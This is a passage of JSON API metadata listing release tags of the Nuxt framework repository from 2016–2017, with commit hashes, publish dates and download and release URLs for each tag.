Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependenc